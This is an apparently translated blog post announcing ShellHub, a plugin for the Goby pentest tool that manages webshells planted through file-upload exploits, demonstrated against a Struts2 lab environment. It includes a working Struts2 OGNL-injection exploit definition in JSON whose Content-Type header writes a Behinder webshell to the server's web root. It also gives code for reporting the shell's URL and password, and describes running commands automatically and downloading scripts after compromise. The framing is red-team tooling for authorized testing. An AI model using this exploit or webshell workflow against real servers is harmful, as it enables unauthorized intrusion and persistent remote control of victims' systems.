Plug in sharing | ShellHub let Goby get through the penetration process

Foreword: it is undoubtedly very exciting to successfully win a webshell in penetration / HW. All along, Goby's use process of Exp for some file upload vulnerabilities is to try to obtain a webshell. The type of webshell will upload ice scorpion horse by default without restriction. If there is no problem, it will print out the URL, password and management tools of webshell, The user can then copy this information and connect it in the corresponding management tool. We have been wondering whether there can be a more elegant way to complete the above process. Just like Goby's existing rebound shell function, click the open shell button to pop up the management interface of the called webshell, and users can directly operate the webshell. In order to further improve the vulnerability utilization process and optimize the user experience, now the ShellHub plug-in comes~

This plug-in is applicable to Goby version: beta version 1.9.307

After reading the article, you can find the way to obtain the internal test version at the end of the article ↓

0 × 01 plug in display

First use vulfocus Quickly open a struts 2 vulnerability environment for demonstration

  • Previous processes: execute Exp to return webshell related information, and users manually copy it into the management tool.
  • Process after using plug-in: execute Exp to get webshell - > one click seamless management of webshell



0 × 02 how to write an Exp that can be managed with one click

To achieve the effect of one click management, you only need to make the Exp return information of file upload vulnerability include: webshell address, webshell connection password and webshell connection tool, as shown in the following example:

WebShell URL: http://vulfocus.fofa.so:44482/kGMklMBK.jsp
Password: JCsiJt
WebShell tool: Behinder v3.0

2.1 go code Exp output example

expResult.Success = true
// You need to bring a wrap
expResult.Output = "Webshell: " + expResult.HostInfo.FixedHostInfo + "/xxxx.jsp\n"
expResult.Output += "Password: f8082d22\n"
expResult.Output += "Webshell tool: Behinder v3.0"

2.2 json Exp example

"set_variable": [
  "file|genshell|exp|B:jsp"
]
// file represents the variable name, which can be specified at will. The variable is actually an array. When it is in the http request header or request body, its value is a shape such as
// <? PHP echo MD5 (random value); unlink(__FILE__);?>
// exp means to upload a webshell
// B:jsp represents the jsp horse that generates the ice scorpion. Similarly, G:jspRaw represents Godzilla's raw type jsp horse

"SetVariable": [
    "output|define|shell_info|/xx/yy/{{{random shell File name variable}}}
]
// In the EXP mode, after uploading a webshell, the matching is to print the name of the shell
// Connection URL, connection password (or key)
// shell_info is used to print prompt information. It will help you print the following output
// WebShell URL: http://vulfocus.fofa.so:44482/kGMklMBK.jsp
// Password: JCsiJt
// WebShell tool: Behinder v3.0
// The fourth part only needs to fill in the relative path of the shell, such as / xx/yy / {random SHELL file name variable}
"ExploitSteps": [
    "AND",
    {
        "Request":{
            "set_variable":[
                "name|rand|str|8",
                "name|name|concat|.jsp",
                "file|genshell|exp|B:jsp"
            ],
            "method":"POST",
            "uri":"/",
            "follow_redirect":true,
            "header":{
                "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=(@org.apache.struts2.ServletActionContext@getRequest())).(#path1=#req.getRealPath('/')).(#sb=(new java.lang.StringBuilder(#path1))).(#path=#sb.append('/{{{name}}}')).(#shell='{{{file}}}').(#file=new java.io.File(#path)).(#fw=new java.io.FileWriter(#file)).(#fw.write(#shell)).(#fw.flush()).(#fw.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).(#ros.print('UPLO')).(#ros.println('AD-OK')).(#ros.flush())}"
            },
            "data_type":"text",
            "data":""
        },
        "ResponseTest":{
            "type":"group",
            "operation":"AND",
            "checks":[
                {
                    "type":"item",
                    "variable":"$body",
                    "operation":"contains",
                    "value":"UPLOAD-OK",
                    "bz":""
                }
            ]
        },
        "SetVariable":[
            "output|define|shell_info|/{{{name}}}"
        ]
    }
]

2.3 ShellHub function points

At the beginning of writing this plug-in, our purpose is to connect to the mainstream webshell to open up the vulnerability utilization process, and then facilitate the direct operation of webshell through code, such as automatically executing our specified command group after obtaining the webshell, automatically downloading and executing sh script to obtain system information, and even uploading some tools for direct scanning, etc.

The current mainstream Webshell management tool, Ice scorpion ,Godzilla,Ant sword Three pillars, think again and again. Finally, in terms of the scope, breadth and habits of users, we chose to connect the ice scorpion horse first. The effect is to use the plug-in to directly connect the ice scorpion horse (of course, there are still many imperfections). The following are the function points currently supported by the plug-in

Supported function pointsJSPXJSPPHPASPXASP
essential information
Document management (part)
Command execution
To be continued

0 × 03 summary

As for the selection of function points, we didn't choose one brain to realize all the existing functions of ice scorpion. On this point, our consideration is that the technology industry has specialized in ice scorpion, and those with other functional requirements of ice scorpion can directly use the ice scorpion client for management. Therefore, we also printed out the connection address and password of webshell. Of course, if users have other needs during use, they can also communicate with us.

Tip: because ice scorpion is widely used, Csharp payload is a dll file, which may be reported as toxic. This plug-in only modifies the file name of dll.

Since this plug-in needs to adapt to the front-end UI and interaction, you need to download the Beta 1.9.307 of Goby beta version to use this plug-in

Internal test version acquisition:

  • WeChat group: the official account is issued with a code "plus group".

Plug in development documentation:

https://gobies.org/docs.html


There are detailed teaching on plug-in development in station B. welcome to take a group photo in the barrage area~

If my cousin / cousin also wants to submit himself to the community (get the red team Special Edition) picture, stamp here to get a plug-in task?

Tags: security IDE webshell

Posted on Fri, 05 Nov 2021 18:46:34 -0400 by mpirvul